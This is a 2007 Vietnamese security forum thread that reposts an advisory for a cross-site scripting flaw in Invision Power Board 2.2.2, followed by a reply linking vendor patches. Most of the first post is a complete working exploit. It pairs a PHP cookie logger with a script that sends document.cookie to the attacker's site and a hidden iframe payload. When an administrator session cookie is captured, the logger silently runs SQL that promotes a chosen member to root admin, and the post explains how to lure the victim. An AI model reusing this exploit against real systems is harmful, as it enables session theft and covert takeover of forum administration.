banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits Invision Power Board Cross Site Scripting Vulnerability  XML
  [Announcement]   Invision Power Board Cross Site Scripting Vulnerability 04/06/2007 18:26:02 (+0700) | #1 | 63100
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]
Invision Power Board Cross Site Scripting Vulnerability
------------------------------------------------------------------------


SUMMARY
A vulnerability in Invision Power Board allows remote attackers to cause a cross site scripting vulnerability which in turn can be used to cause the administrator of the form, or any other privileged user to execute arbitrary commands (SQL commands), the following exploit code can be used to test your system for the mentioned vulnerability.

DETAILS
Vulnerable Systems:
* Invision Power Board version 2.2.2

Exploit:
Code:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
#
# Invision Power Board 2.2.2 Cross Site Scripting vulnerability
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
# Vendor site: http://www.invisionboard.com/
# Vulnerability found by Iron (http://www.ironwarez.info)
#
# Greets to all RootShell Security Group members
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
# The vulnerability:
# Open up any php file in /jscripts/folder_rte_files
#  See:

    var editor_id         = <?php print 
'"'.trim($_REQUEST['editorid']).'";'; ?>
 
#
# $_REQUEST['editorid'] isn't sanitized in any way, so allows
# other uses to execute their own code.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
# PoC (Log cookies & run SQL query)
#
# Requirements: server supporting PHP, user account on
# target forum, database prefix needs to be known.
#
# Create a file called name.php on your webserver and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#

<?php
$target = "http://www.yourtarget.com/forum"; #Target forum without 
trailing slash
$prefix = "ibf_"; #Database prefix, default: ibf_
$member = 22; #Member id to promote
$newgroup = 4; # The id of the new group to promote, normally 4 is root 
admin

$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

$data = $_GET['c'];
$time = date("Y-m-d G:i:s A");
$text = "Time: 
".$time."\nIP:".$ip."\nReferer:".$referer."\nUser-Agent:".$agent."\nCookie:".$data."\n\n";

$file = fopen('log.txt' , 'a');
fwrite($file,$text);
fclose($file);
if(preg_match("/ipb_admin_session_id=([0-9a-z]{32});/",$data,$stuff))
{
print '<iframe width=0 height=0 
src="'.$target.'/admin/index.php?adsess='.$stuff[1].'&act=sql&code=runsql§ion=admin&query=UPDATE+'.$prefix.'members+SET+mgroup+%3D+%27'.$newgroup.'%27+WHERE+id+%3D+%27'.$member.'%27&st="></iframe>';
}
?>
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
#  Also create a file in the same directory named "log.txt" and chmod it 
777
#
#  Now, create a file called script.js on your webserver, put this code in 
it:
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#

document.location="http://www.yourownsite.com/path/to/file/name.php?c="+document.cookie;

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
#
#  And, last but not least, create a file that combines those two ;)
#  Name it blah.html and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#

<iframe border=0 
src="http://www.targetforum.com/forum_folder/jscripts/folder_rte_files/module_table.php?editorid=//--></script><script src=http://www.yourownsite.com/path/to/file/script.js>" width=0 height=0></iframe>

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
# Now, post a message on the forum or send a pm to your target with the 
link to the html page.
#  If a normal user views the page, his cookies
#  will be logged, funny. If an admin visits the page and he has an 
admin_session_id cookie set,
# he will add you to the root admin group without even knowing ;).



ADDITIONAL INFORMATION
The information has been provided by Iron.
The original article can be found at: http://www.ironwarez.info


Comment: sắp sửa có một loạt IBP bị phá hoại.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Invision Power Board Cross Site Scripting Vulnerability 05/06/2007 13:50:11 (+0700) | #2 | 63269
[Avatar]
Z0rr0
Q+WRtaW5pc3RyYXRvc+g

Joined: 14/08/2002 12:52:01
Messages: 1323
Location: Underground
Offline
[Profile] [PM] [WWW] [Yahoo!]
Fix cho ver 2.2.x đến ngày 30/5/2007 tại đây:
http://forums.invisionpower.com/index.php?showtopic=234377
http://forums.invisionpower.com/index.php?showtopic=235069
Hibernating
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|